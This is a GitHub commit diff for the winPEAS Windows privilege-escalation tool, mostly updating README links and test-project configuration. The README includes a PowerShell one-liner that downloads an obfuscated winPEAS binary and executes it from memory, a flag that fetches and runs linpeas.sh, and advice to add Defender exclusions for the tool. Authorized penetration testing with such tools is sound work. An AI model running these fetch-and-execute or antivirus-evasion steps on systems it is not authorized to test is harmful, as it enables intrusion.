PenTest/privilege-escalation-awesome-scripts-suite
1
0
Fork 0
mirror of https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git synced 2025-12-06 09:01:29 +00:00
Code Issues Projects Releases Wiki Activity

Merge branch 'peass-ng:master' into master

Browse Source
This commit is contained in:
RandolphConley
2024-10-01 09:20:52 -04:00
committed by GitHub
parent ac6b5a9add 6854d3ae30
commit 95a508171f
338 changed files with 12882 additions and 5720 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
winPEAS/README.md
View File

@@ -1,19 +1,19 @@
# Windows Privilege Escalation Awesome Scripts
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/winpeas.png)
![](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/winpeas.png)
Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
Check more **information about how to exploit** found misconfigurations in **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
## Quick Start
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
## WinPEAS Flavours
- [Link to WinPEAS C# .exe project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
- [Link to WinPEAS C# .exe project](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
- **Please, read the Readme of that folder to learn how to execute winpeas from memory or how make colors work among other tricks**
- [Link to WinPEAS .ps1 project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASps1)
- [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat)
- [Link to WinPEAS .ps1 project](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASps1)
- [Link to WinPEAS .bat project](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASbat)
## PEASS Style
@@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

5
winPEAS/winPEASbat/README.md
View File

@@ -1,6 +1,6 @@
# Windows Privilege Escalation Awesome Script (.bat)
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/winpeas.png)
![](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/winpeas.png)
**WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
@@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

28
winPEAS/winPEASexe/README.md
View File

@@ -1,23 +1,23 @@
# Windows Privilege Escalation Awesome Script (.exe)
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/winpeas.png)
![](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/winpeas.png)
**WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
Check also the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
[![youtube](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/screen.png)](https://youtu.be/66gOwXMnxRI)
[![youtube](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/screen.png)](https://youtu.be/66gOwXMnxRI)
## Quick Start
**.Net >= 4.5.2 is required**
Precompiled binaries:
- Download the **[latest obfuscated and not obfuscated versions from here](https://github.com/carlospolop/PEASS-ng/releases/latest)** or **compile it yourself** (read instructions for compilation).
- Download the **[latest obfuscated and not obfuscated versions from here](https://github.com/peass-ng/PEASS-ng/releases/latest)** or **compile it yourself** (read instructions for compilation).
```bash
# Get latest release
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
# One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
@@ -61,7 +61,7 @@ winpeas.exe domain #enumerate also domain information
winpeas.exe wait #wait for user input between tests
winpeas.exe debug #display additional debug information
winpeas.exe log #log output to out.txt instead of standard output
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/linPEAS/linpeas.sh)
winpeas.exe -lolbas #Execute also additional LOLBAS search check
```
@@ -82,7 +82,7 @@ REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Below you have some indications about what does each color means exacty, but keep in mind that **Red** is for something interesting (from a pentester perspective) and **Green** is something well configured (from a defender perspective).
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/colors.png)
![](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/colors.png)
## Instructions to compile you own obfuscated version
@@ -104,7 +104,7 @@ Once you have installed and activated it you need to:
**I'm sorry that all of this is necessary but is worth it. Dotfuscator minimizes a bit the size of the executable and obfuscates the code**.
![](https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASexe/images/dotfuscator.PNG)
![](https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASexe/images/dotfuscator.PNG)
**IMPORTANT**: Note that Defender will higly probable delete the winpeas iintial unobfuscated version, so you need to set as expections the origin folder of Winpeas and the folder were the obfuscated version will be saved:
![](https://user-images.githubusercontent.com/1741662/148418852-e7ffee6a-c270-4e26-bf38-bb8977b3ad9c.png)
@@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70)
- [x] Internet Settings
- **Cloud Metadata Enumeration**
- [x] AWS Metadata
- [x] GCP Metadata
- [x] Azure Metadata
- **Windows Credentials**
- [x] Windows Vault
- [x] Credential Manager
@@ -239,7 +244,7 @@ Once you have installed and activated it you need to:
- **Additional (slower) checks**
- [x] LOLBAS search
- [x] run **[linpeas.sh](https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)** in default WSL distribution
- [x] run **[linpeas.sh](https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/linPEAS/linpeas.sh)** in default WSL distribution
</details>
@@ -247,15 +252,12 @@ Once you have installed and activated it you need to:
- Add more checks
- Mantain updated Watson (last JAN 2021)
If you want to help with any of this, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** or you can submit a pull request.
If you want to help with any of this, you can do it using **[github issues](https://github.com/peass-ng/PEASS-ng/issues)** or you can submit a pull request.
If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**.
If you find any issue, please report it using **[github issues](https://github.com/peass-ng/PEASS-ng/issues)**.
**WinPEAS** is being **updated** every time I find something that could be useful to escalate privileges.
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

1
winPEAS/winPEASexe/Tests/.vs/winPEAS.Tests.csproj.dtbcache.json Normal file
View File

@@ -0,0 +1 @@
{"RootPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests","ProjectFileName":"winPEAS.Tests.csproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[],"References":[],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests\\bin\\Debug\\Tests.dll","OutputItemRelativePath":"Tests.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}

56
winPEAS/winPEASexe/Tests/App.config
View File

@@ -1,6 +1,54 @@
<?xml version="1.0" encoding="utf-8" ?>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
</startup>
<configSections>
<!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
</configSections>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
</startup>
<entityFramework>
<providers>
<provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
<provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
</providers>
</entityFramework>
<system.data>
<DbProviderFactories>
<remove invariant="System.Data.SQLite.EF6" />
<add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
<remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
</system.data>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Reflection" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Runtime.Extensions" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Text.RegularExpressions" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.1.1.0" newVersion="4.1.1.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Linq" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Diagnostics.Tracing" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-4.2.0.0" newVersion="4.2.0.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>

3
winPEAS/winPEASexe/Tests/FodyWeavers.xml Normal file
View File

@@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

141
winPEAS/winPEASexe/Tests/FodyWeavers.xsd Normal file
View File

@@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeReferences" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

2
winPEAS/winPEASexe/Tests/SmokeTests.cs
View File

@@ -12,7 +12,7 @@ namespace winPEAS.Tests
try
{
string[] args = new string[] {
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug"
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
};
Program.Main(args);
}

41
winPEAS/winPEASexe/Tests/packages.config
View File

@@ -1,7 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="Costura.Fody" version="5.7.0" targetFramework="net452" developmentDependency="true" />
<package id="EntityFramework" version="6.4.4" targetFramework="net452" />
<package id="Fody" version="6.5.5" targetFramework="net452" developmentDependency="true" />
<package id="Microsoft.CodeCoverage" version="16.10.0" targetFramework="net452" />
<package id="Microsoft.NET.Test.Sdk" version="16.10.0" targetFramework="net452" />
<package id="Microsoft.NETCore.Platforms" version="1.1.0" targetFramework="net452" />
<package id="MSTest.TestAdapter" version="2.2.5" targetFramework="net452" />
<package id="MSTest.TestFramework" version="2.2.5" targetFramework="net452" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net452" />
<package id="Portable.BouncyCastle" version="1.9.0" targetFramework="net452" />
<package id="Stub.System.Data.SQLite.Core.NetFramework" version="1.0.119.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Collections" version="4.3.0" targetFramework="net452" />
<package id="System.Collections.Concurrent" version="4.3.0" targetFramework="net452" />
<package id="System.Data.SQLite" version="1.0.119.0" targetFramework="net452" />
<package id="System.Data.SQLite.Core" version="1.0.119.0" targetFramework="net452" />
<package id="System.Data.SQLite.EF6" version="1.0.119.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Data.SQLite.Linq" version="1.0.119.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Diagnostics.Debug" version="4.3.0" targetFramework="net452" />
<package id="System.Diagnostics.Tools" version="4.3.0" targetFramework="net452" />
<package id="System.Diagnostics.Tracing" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Globalization" version="4.3.0" targetFramework="net452" />
<package id="System.IO" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.IO.Compression" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Linq" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Linq.Expressions" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Net.Http" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Net.Primitives" version="4.3.0" targetFramework="net452" />
<package id="System.ObjectModel" version="4.3.0" targetFramework="net452" />
<package id="System.Reflection" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Reflection.Extensions" version="4.3.0" targetFramework="net452" />
<package id="System.Reflection.Primitives" version="4.3.0" targetFramework="net452" />
<package id="System.Resources.ResourceManager" version="4.3.0" targetFramework="net452" />
<package id="System.Runtime" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Runtime.Extensions" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Runtime.InteropServices" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Runtime.InteropServices.RuntimeInformation" version="4.3.0" targetFramework="net452" />
<package id="System.Runtime.Numerics" version="4.3.0" targetFramework="net452" />
<package id="System.Text.Encoding" version="4.3.0" targetFramework="net452" />
<package id="System.Text.Encoding.Extensions" version="4.3.0" targetFramework="net452" />
<package id="System.Text.RegularExpressions" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Threading" version="4.3.0" targetFramework="net452" />
<package id="System.Threading.Tasks" version="4.3.0" targetFramework="net452" />
<package id="System.Threading.Timer" version="4.3.0" targetFramework="net452" />
<package id="System.Xml.ReaderWriter" version="4.3.0" targetFramework="net452" requireReinstallation="true" />
<package id="System.Xml.XDocument" version="4.3.0" targetFramework="net452" />
</packages>

43
winPEAS/winPEASexe/Tests/winPEAS.Tests.csproj
View File

@@ -1,5 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props')" />
<Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.props" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" />
<Import Project="..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props" Condition="Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props')" />
<Import Project="..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.props" Condition="Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.props')" />
<Import Project="..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.props" Condition="Exists('..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.props')" />
@@ -11,12 +13,13 @@
<OutputType>Library</OutputType>
<RootNamespace>Tests</RootNamespace>
<AssemblyName>Tests</AssemblyName>
<TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
@@ -41,6 +44,18 @@
<StartupObject />
</PropertyGroup>
<ItemGroup>
<Reference Include="BouncyCastle.Crypto, Version=1.9.0.0, Culture=neutral, PublicKeyToken=0e99375e54769942, processorArchitecture=MSIL">
<HintPath>..\packages\Portable.BouncyCastle.1.9.0\lib\net40\BouncyCastle.Crypto.dll</HintPath>
</Reference>
<Reference Include="Costura, Version=5.7.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll</HintPath>
</Reference>
<Reference Include="EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.dll</HintPath>
</Reference>
<Reference Include="EntityFramework.SqlServer, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.SqlServer.dll</HintPath>
</Reference>
<Reference Include="Microsoft.VisualStudio.CodeCoverage.Shim, Version=15.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\Microsoft.CodeCoverage.16.10.0\lib\net45\Microsoft.VisualStudio.CodeCoverage.Shim.dll</HintPath>
</Reference>
@@ -51,7 +66,23 @@
<HintPath>..\packages\MSTest.TestFramework.2.2.5\lib\net45\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.ComponentModel.Composition" />
<Reference Include="System.ComponentModel.DataAnnotations" />
<Reference Include="System.Core" />
<Reference Include="System.Data.SQLite, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\lib\net451\System.Data.SQLite.dll</HintPath>
</Reference>
<Reference Include="System.Data.SQLite.EF6, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\System.Data.SQLite.EF6.1.0.119.0\lib\net451\System.Data.SQLite.EF6.dll</HintPath>
</Reference>
<Reference Include="System.Data.SQLite.Linq, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\System.Data.SQLite.Linq.1.0.119.0\lib\net451\System.Data.SQLite.Linq.dll</HintPath>
</Reference>
<Reference Include="System.IO.Compression" />
<Reference Include="System.Numerics" />
<Reference Include="System.Runtime.InteropServices.RuntimeInformation, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll</HintPath>
</Reference>
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
@@ -84,8 +115,18 @@
<Error Condition="!Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets'))" />
<Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props'))" />
<Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets'))" />
<Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.props'))" />
<Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.targets'))" />
<Error Condition="!Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets'))" />
<Error Condition="!Exists('..\packages\Fody.6.5.5\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.5.5\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props'))" />
